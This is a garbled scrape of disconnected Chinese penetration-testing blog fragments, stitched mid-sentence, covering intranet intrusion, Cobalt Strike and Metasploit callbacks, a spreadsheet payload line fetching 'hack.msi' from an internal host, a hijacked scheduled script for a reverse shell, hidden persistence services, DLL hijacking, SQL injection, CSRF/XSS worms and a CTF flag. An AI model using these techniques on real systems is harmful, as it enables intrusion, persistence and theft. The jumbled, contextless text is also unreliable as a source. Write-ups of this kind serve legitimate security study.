“%userprofile%\Recent*.*最后清除在边界机器里上传的工具与脚本并清除日志。From:https://hui-blog.cool/posts/9ef8.html往期推荐

内网信息收集信息收集：当前system权限，只有一个网段192.168.0.0/24，并发现存在域环境：latam.com，当前机器是域内机器。域控主机主域控：ARBUEDCP02$

内网渗透有杀软，做完免杀之后，直接上线CS，进行进程迁移。存在杀软写入注册表，做好权限维持，这里忘记截图了。shell

http://192.168.169.128:8000/hack.msi")=HALT()右键打开启用宏即可MSF上线From:https://ch1e.gitee.io往期推荐

2007.扫描的时候遇到403了，上目录扫描工具，扫目录，扫文件（记住，扫描的时候要打开探测403，因为有些网站的目录没有权限访问会显示403，但是在这个目录下面的文件，我们或许能扫描到并访问

来远程加载执行beacon准备计划任务执行的bat脚本update.bat，放到目标机器临时目录下c:\windows\temp\delete.bat[delete.bat]cd

所以很多浏览器默认会直接限制请求，跨域请求可能不是浏览器直接拦截掉了，而是跨站请求发起了，但是返回结果被浏览器拦截了，请求实际上已经发送到了后端服务器，只是无法读取回复而已。但因为安全

'http://xxxx-xxx.com/xxxxx/xxxxxxx.do?toTeacherPage&fun=jsxgmm&childs=XXXXXX~9001~xxxxxx~1&flag=1',

t)有一个坑，因为时区原因，从获得的时间反推时间戳的时候需要加8个小时*ctf{Y0u_Are_t3e_Master_of_3he_Time!}

C-xxxx打印服务系统未授权访问只要一直点直接打印，打印机就会一直出纸，也可以DIY打印内容，只需要替换框中的内容即可，后来沟通中反馈说打印机除了非常多的纸，部分员工还以为打印机坏了0x03

?)返回包显示Success，猜测可能语句执行成功，但是没有返回点，故此通过sleep(3)来进行判断可以看到burp提示了3秒钟，尝试修改为5秒确认存在SQL注入Payloadselect

\\10.129.151.127密码直接空密码，回车即可可以看到这里共享了四个目录，非管理共享目录的话就是backups了所以任务2的答案是backups任务3：SMB共享文件中标识的密码是什么？

/usr/share/cleanup/tidyup.sh然后Kali进行监听，因为该脚本为定时执行，我们只需要等待shell弹回来即可

结语遵纪守法，不对没有授权的站点进行测试From：https://xz.aliyun.com/t/11451欢迎

$this->maxRetries变量都可以控制，如果$res可以控制的话那么就可以执行命令了通过这条$res

oss2枚举存储空间：很多时候，你拿到的可能只是一个存储空间的访问地址，而accesskey的访问权限可能更大，这个时候就需要对存储空间进行枚举，看看其他空间是否有权限访问和有自己需要的信息。#

前言之前盲目于一直挖洞每天技术都没什么增长，多的仅是那么一点点的经验，所以接下来的日子里，都会尽量去接触一些自己的知识盲区来扩大自己的知识面。0x01

前言无意中接触到一个网站，所以索性尝试一下，都是一些基本操作，大佬看看就可以了奥。注：由于保密问题，所有关于对方信息网址等各项信息都将保密打上马赛克，能打的都打上马赛克。0x01

3｜【PyHacker编写指南】爆破一句话密码//

【函数配置】里面，最好把执行超时时间设置成和蚁剑里面的超时时间一样或者更长来源：http://www.xpshuai.cn/%E5%88%E5%AE%9EIP.html往期推荐

shell1.php成功拿到shell当前shell是一个普通权限，但是目标是后面的所有机器，所以这台机器www权限也是可以的，我们把会话派生到msf上，使用msf生成一个木马msfvenom

ps:如果部分模拟器不支持此后缀安装，可以将其修改为cer后缀再进行安装至此已经完成配置，即可再安卓模拟器中正常抓取https流量0x03

代码审计之越权访问我们这里先登录到后台，抓一个后台的包包里的cookie有个user=admin

3｜【实战】储存XSS+CSRF（XSS绕过到蠕虫攻击）//

CDN配置文件之使用Profile使用的2.4.3https://github.com/rsmudge/Malleable-C2-Profiles修改Profilehttps-certificate

192.168.4.142同样的通过s4u2self来进行相关的cifs的服务票据，然后通过smbexec来进行命令执行，我这里用windows来进行演示下python

Token，这个Token在用户创建进程或者线程时会被使用，不断的拷贝。这也就解释了A用户创建一个进程而该进程没有B用户的权限，因为默认打开一个进程都是以自身的令牌去验证启动的。Access

前言项目中碰到了一个端口存在目录遍历，比较运气的是泄漏了ASP.NET的obj目录，最终找到了Web功能模块的DLL，实现了未授权的文件上传GetShell。0x02

)，因此其实对于一般的服务器来说，绑定自己的外网IP和直接绑定0.0.0.0是没区别的，不设置密码的情况下去绑定外网IP起不到任何的保护作用，返回会因为绑定了地址让保护模式失效遭受攻击。(2)使用

http://:www.xxx.com/tunnel.xxx这个端口就是你所使用的本地代理端口，待会我们将使用

(这里所有字符之间不要有空格)说明：1）这里两个都是将文件描述符n复制到m，两者的区别是，前者是以只读的形式打开，后者是以写的形式打开因此0&1是完全等价的（读/写方式打开对其没有任何影响）

（2）判断点击这个链接的地点是不是在QQ内部，如果不是就会直接跳转到真的QQ空间登录（因为他知道你不在QQ里面没有session之类的就没法在输入密码之后成功登进去，就露馅了）

对某快捷酒店一次内网测试记一次某山信息泄露+源码泄露getshell记一些linux安全应急排查思路和命令通过修改注册表减少DDoS攻击记一次对钓鱼诈骗网站的渗透测试

华为防火墙之类的，我又看了一下445,139端口似乎没有开启的主机。临时想不到什么快捷的方法，时间也不早了，明天一大早还有事，暂且放你一马~~0x04

记一次绕过安全狗与360艰难提权记一次对钓鱼诈骗网站的渗透测试代码审计VauditDemo程序到exp编写记一些linux安全应急排查思路和命令网鼎杯-青龙组-Web-Wp

记一次对钓鱼诈骗网站的渗透测试记一次初学PHP反序列化（总结）绕过CDN查找真实IP通过修改注册表减少DDoS攻击

前言背景一个学长前几天不幸在钓鱼网站中招被骗走一些资金，在联系有关部门前找到了我看看能不能获取到一些有用的信息以便于有关部门行动0x02

handler语句代替select查询:这个方法在GYCTF中本题的升级版（多过滤了prepare、set、rename，显然前两种方法都不适用）中亮相1';handler

filename.在使用默认语言环境设置时，basename()会删除文件名开头的非ASCII字符。测试代码：

linux常见命令查看系统状态top命令(常用于挖矿应急响应)查看非root运行的进程ps

做NAT时放大转换的对外端口最大值HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services:\Tcpip\ParametersMaxUserPort

正文（隐藏服务）为了不让管理员发现用于权限维持的服务，通过SDDL修改服务的安全描述符，安全描述符是用来配置该服务允许哪些用户权限访问使用sc程序的sdset模块修改安全描述符sc.exe

4｜【PyHacker编写指南】爆破一句话密码

邮箱系统SQL注入&Getshell&远程代码执行U-mail挺老的邮件系统了，很多洞，经过测试，通过注入into

我们也可以把他反序列化输出看看最后我们复制生成出来的字符串然后接str参数就可以访问到flag.php文件了前端没有，查看源代码成功获取Flag！最后，技术上有你有我，愿我们早日成为大牛！往期推荐

4｜【实战】储存XSS+CSRF（XSS绕过到蠕虫攻击）

前言程序启动会调用固定的.dll文件，通过特定的手法将木马代码和进程注入到可被劫持的DLL文件中，当程序正常启动，我们代码也会秘密执行。0x01

得到连接：CSRF：http://xxx.edu.cn/meol/xxx?type=&studyCircleId=&saytext=%B9%FE%B9%FE点击链接会自动发表内容我们缩短一下链接

利用Fofa、Shadon等搜索引擎https://www.fofa.so/https://www.shodan.io/https://censys.io/以fofa为例：

经过前几节的文章，不知道小伙伴们有没有跟着写下来，如果写下来肯定会有很大的提升，这里是我之前做的笔记，分享出来给大家做个参考PyHacker系列就到此结束了，喜欢的点个Star吧项目笔记地址：https://github.com/hackxc/Pyhacker